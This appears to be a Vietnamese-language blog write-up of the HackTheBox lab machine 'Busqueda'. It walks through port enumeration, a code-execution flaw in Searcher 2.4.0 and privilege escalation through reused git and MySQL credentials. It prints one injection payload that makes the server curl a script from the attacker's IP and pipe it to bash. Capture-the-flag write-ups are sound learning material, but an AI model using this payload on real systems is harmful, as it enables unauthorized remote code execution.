Busqueda

byDryu8 2 min read
0

Busqueda là một máy windows trong Open Beta Season của HackTheBox.

Enumeration

Zenmap:


Server mở port 22, 80 và có domain là searcher.htb, thêm chúng vào file hosts.

Liệt kê website, tôi thấy đây là một website Searcher version 2.4.0, tìm kiếm các vuln về nó tôi tìm thấy: Arbitrary Code Execution
Từ đó tôi thiết lập payload như sau:
Payload: "http://127.0.0.1/debug' eval(compile('for x in range(1):\n import os\n os.system("curl http://10.10.**.**/shell|bash")','a','single'))"
Nâng Quyền:
Tôi tìm thấy git bên trong folder web, kiểm tra nó:
Tôi có user và pass của git, thử sử dụng pass tôi mới tìm được login vào svc.

Kiểm tra file system-checkup.py
Tại đây tôi có được thông tin pass của mysql thử các pass này với gitea cho user administrator.
Đây là thông tin file system-checkup.py


4.94 / 169 rates
Dryu8

Dryu8 is just a newbie in pentesting and loves to drink beer. I will be happy if you can donate me with a beer.

Post a Comment

Previous Post Next Post